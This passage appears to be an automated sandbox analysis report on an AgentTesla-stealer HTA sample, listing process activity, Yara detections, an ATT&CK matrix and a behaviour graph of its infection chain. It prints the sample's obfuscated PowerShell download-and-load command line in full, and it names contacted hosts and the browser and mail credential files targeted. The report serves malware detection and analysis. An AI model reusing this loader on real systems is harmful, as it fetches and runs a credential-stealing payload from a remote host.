t#gu#cgbp#g4#zq#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#cq#bwby#gk#zwbp#g4#yqby#hk#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbf#e4#r##+#d4#jw#7#cq#bgbv#g4#ywbs#g8#d#bo#gk#bgbn#c##pq#g#cq#zwbl#hi#dqbu#gq#aqbh#gw#b#b5#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqb0#gg#bqbv#hy#bwbt#gu#cgbp#g4#zq#p#ds#j#bt#gu#d#bv#g4#eqbt#hm#i##9#c##j#bn#gu#cgb1#g4#z#bp#ge#b#bs#hk#lgbj#g4#z#bl#hg#twbm#cg#j#bv#hi#aqbn#gk#bgbh#hi#eq#p#ds#j#bu#g8#bgbj#gw#bwb0#gg#aqbu#gc#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bt#gu#d#bv#g4#eqbt#hm#i##t#gc#d##g#cq#bgbv#g4#ywbs#g8#d#bo#gk#bgbn#ds#j#bu#g8#bgbj#gw#bwb0#gg#aqbu#gc#i##r#d0#i##k#gu#d#bo#g0#bwb2#g8#bqbl#hi#aqbu#gu#lgbm#gu#bgbn#hq#a##7#cq#cwbw#ge#ywbp#gu#cg#g#d0#i##k#g0#zqb0#g8#bgb5#g0#cw#g#c0#i##k#g4#bwbu#gm#b#bv#hq#a#bp#g4#zw#7#cq#cwb1#gi#agbl#gm#d##g#d0#i##k#gc#zqby#hu#bgbk#gk#yqbs#gw#eq#u#fm#dqbi#hm#d#by#gk#bgbn#cg#j#bu#g8#bgbj#gw#bwb0#gg#aqbu#gc#l##g#cq#cwbw#ge#ywbp#gu#cg#p#ds#j#bn#hi#eqbs#gw#dqbz#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbd#g8#bgb2#gu#cgb0#f0#og#6#ey#cgbv#g0#qgbh#hm#zq#2#dq#uwb0#hi#aqbu#gc#k##k#hm#dqbi#go#zqbj#hq#kq#7#cq#ygbh#gm#awbj#gg#yqbu#g4#zqbs#hm#i##9#c##wwbt#hk#cwb0#gu#bq#u#fi#zqbm#gw#zqbj#hq#aqbv#g4#lgbb#hm#cwbl#g0#ygbs#hk#xq#6#do#t#bv#ge#z##o#cq#zwby#hk#b#bs#hu#cw#p#ds#j#bp#g4#ywbs#gu#i##9#c##wwbk#g4#b#bp#gi#lgbj#e8#lgbi#g8#bqbl#f0#lgbh#gu#d#bn#gu#d#bo#g8#z##o#cc#vgbb#ek#jw#p#c4#sqbu#hy#bwbr#gu#k##k#g4#dqbs#gw#l##g#fs#bwbi#go#zqbj#hq#wwbd#f0#i#b##cg#j#bz#g4#aqb0#hq#eq#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#tqbt#ei#dqbp#gw#z##n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#ck#kq#='; $owjuxd = [system.text.encoding]::unicode.getstring([convert]::from
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#bl#hg#a#bh#hu#cwb0#gu#z##g#d0#i##n#hq#e#b0#c4#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##0#dq#n##2#gu#cwbh#gi#lw#3#de#lg#w#di#mg#u#dm#lg#y#dk#mq#v#c8#ogbw#hq#d#bo#cc#ow#k#hm#bgbp#hq#d#b5#c##pq#g#cq#zqb4#gg#yqb1#hm#d#bl#gq#i##t#hi#zqbw#gw#yqbj#gu#i##n#cm#jw#s#c##jwb0#cc#ow#k#hm#a#bv#hy#zqbs#ge#cgbk#c##pq#g#cc#a#b0#hq#c#bz#do#lw#v#de#m##w#dc#lgbm#gk#b#bl#g0#yqbp#gw#lgbj#g8#bq#v#ge#c#bp#c8#zgbp#gw#zq#v#gc#zqb0#d8#zgbp#gw#zqbr#gu#eq#9#eu#uwbz#fq#aqbu#fi#mwbp#d##mwbf#du#cqby#e0#bgbj#hk#eqbx#hq#wqbm#du#twbn#ey#vq#w#g0#yqbr#hg#tqb1#d##zqbq#he#ugbs#eo#tgbp#gm#tgbq#em#mw#2#ge#o#bu#di#agbh#gy#vwbu#dy#rgbf#ei#ag#1#hm#jgbw#gs#xwb2#gk#z##9#dm#n##y#dg#m##z#gq#mqbj#gm#n#bl#dm#yg#4#d##mq#3#dq#m##2#dy#nw#w#du#m##4#d##yq#1#gu#zg#n#ds#j#bv#hi#zwbh#g4#bwbs#ge#bgb0#gg#yqbu#hu#bq#g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#j#bz#hq#aqbs#gi#zqbu#gu#i##9#c##j#bv#hi#zwbh#g4#bwbs#ge#bgb0#gg#yqbu#hu#bq#u#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#cg#j#bz#gg#bwb2#gu#b#bh#hi#z##p#ds#j#bn#gu#cgb1#g4#z#bp#ge#b#bs#hk#i##9#c##wwbt#hk#cwb0#gu#bq#u#fq#zqb4#hq#lgbf#g4#ywbv#gq#aqbu#gc#xq#6#do#vqbu#ey#o##u#ec#zqb0#fm#d#by#gk#bgbn#cg#j#bz#hq#aqbs#gi#zqbu#gu#kq#7#cq#zqb0#gg#bqbv#hy#bwbt#gu#cgbp#g4#zq#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#cq#bwby#gk#zwbp#g4#yqby#hk#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbf#e4#r##+#d4#jw#7#cq#bgbv#g4#ywbs#g8#d#bo#gk#bgbn#c##pq#g#cq#zwbl#hi#dqbu#gq#aqbh#gw#b#b5#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqb0#gg#bqbv#hy#bwbt#gu#cgbp#g4#zq#p#ds#j#bt#gu#d#bv#g4#eqbt#hm#i##9#c##j#bn#gu#cgb1#g4#z#bp#ge#b#bs#hk#lgbj#g4#z#bl#hg#twbm#cg#j#bv#hi#aqbn#gk#bgbh#hi#eq#p#ds#j#bu#g8#bgbj#gw#bwb0#gg#aqbu#gc#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bt#gu#d#bv#g4#eqbt#hm#i##t#gc#d##g#cq#bgbv#g4#ywbs#g8#d#bo#gk#bgbn#ds#j#bu#g8#bgbj#gw#bwb0#gg#aqbu#gc#i##r#d0#i##k#gu#d#bo#g0#bwb2#g8#bqbl#hi#aqbu#gu#lgbm#gu#bgbn#hq#a##7#cq#cwbw#ge#ywbp#gu#cg#g#d0#i##k#g0#zqb0#g8#bgb5#g0#cw#g#c0#i##k#g4#bwbu#gm#b#bv#hq#a#bp#g4#zw#7#cq#cwb1#gi#agbl#gm#d##g#d0#i##k#gc#zqby#hu#bgbk#gk#yqbs#gw#eq#u#fm#dqbi#hm#d#by#gk#bgbn#cg#j#bu#g8#bgbj#gw#bwb0#gg#aqbu#gc#l##g#cq#cwbw#ge#ywbp#gu#cg#p#ds#j#bn#hi#eqbs#gw#dqbz#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbd#g8#bgb2#gu#cgb0#f0#og#6#ey#cgbv#g0#qgbh#hm#zq#2#dq#uwb0#hi#aqbu#gc#k##k#hm#dqbi#go#zqbj#hq#kq#7#cq#ygbh#gm#awbj#gg#yqbu#g4#zqbs#hm#i##9#c##wwbt#hk#cwb0#gu#bq#u#fi#zqbm#gw#zqbj#hq#aqbv#g4#lgbb#hm#cwbl#g0#ygbs#hk#xq#6#do#t#bv#ge#z##o#cq#zwby#hk#b#bs#hu#cw#p#ds#j#bp#g4#ywbs#gu#i##9#c##wwbk#g4#b#bp#gi#lgbj#e8#lgbi#g8#bqbl#f0#lgbh#gu#d#bn#gu#d#bo#g8#z##o#cc#vgbb#ek#jw#p#c4#sqbu#hy#bwbr#gu#k##k#g4#dqbs#gw#l##g#fs#bwbi#go#zqbj#hq#wwbd#f0#i#b##cg#j#bz#g4#aqb0#hq#eq#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#tqbt#ei#dqbp#gw#z##n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#ck#kq#='; $owjuxd = [system.text.encoding]::unicode.getstring([convert]::fromJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7784, type: MEMORYSTR
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7784, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7784, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information212
                        Scripting                        		Valid Accounts231
                        Windows Management Instrumentation                        		212
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		111
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Input Capture                        		35
                        System Information Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		Logon Script (Windows)Logon Script (Windows)1
                        Obfuscated Files or Information                        		Security Account Manager531
                        Security Software Discovery                        		SMB/Windows Admin Shares11
                        Email Collection                        		11
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login HookLogin Hook1
                        DLL Side-Loading                        		NTDS1
                        Process Discovery                        		Distributed Component Object Model1
                        Input Capture                        		2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Masquerading                        		LSA Secrets261
                        Virtualization/Sandbox Evasion                        		SSHKeylogging13
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts261
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                        Process Injection                        		DCSync1
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1629094 Sample: morninghtaaaafilex.hta Startdate: 04/03/2025 Architecture: WINDOWS Score: 100 43 paste.ee 2->43 45 tse1.mm.bing.net 2->45 47 8 other IPs or domains 2->47 63 Suricata IDS alerts for network traffic 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 71 17 other signatures 2->71 10 mshta.exe 2 2->10         started        signatures3 69 Connects to a pastebin service (likely for C&C) 43->69 process4 file5 37 C:\Windows\Temp\misdivide.bat, DOS 10->37 dropped 13 cmd.exe 2 10->13         started        process6 file7 39 C:\Windows\Temp\octupole.vbs, ASCII 13->39 dropped 75 Command shell drops VBS files 13->75 17 wscript.exe 14 13->17         started        21 conhost.exe 13->21         started        23 timeout.exe 1 13->23         started        signatures8 process9 dnsIp10 41 paste.ee 23.186.113.60, 443, 49733 KLAYER-GLOBALNL Reserved 17->41 55 System process connects to network (likely due to code injection or exploit) 17->55 57 Suspicious powershell command line found 17->57 59 Wscript starts Powershell (via cmd or directly) 17->59 61 2 other signatures 17->61 25 powershell.exe 15 15 17->25         started        signatures11 process12 dnsIp13 49 192.3.220.17, 49735, 80 AS-COLOCROSSINGUS United States 25->49 51 ip.1007.filemail.com 142.215.209.72, 443, 49734 HUMBER-COLLEGECA Canada 25->51 73 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 25->73 29 MSBuild.exe 14 2 25->29         started        33 MSBuild.exe 25->33         started        35 conhost.exe 25->35         started        signatures14 process15 dnsIp16 53 ip-api.com 208.95.112.1, 49736, 80 TUT-ASUS United States 29->53 77 Tries to steal Mail credentials (via file / registry access) 29->77 79 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->79 81 Tries to harvest and steal browser information (history, passwords, etc) 29->81 83 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 33->83 85 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 33->85 87 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 33->87 signatures17

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.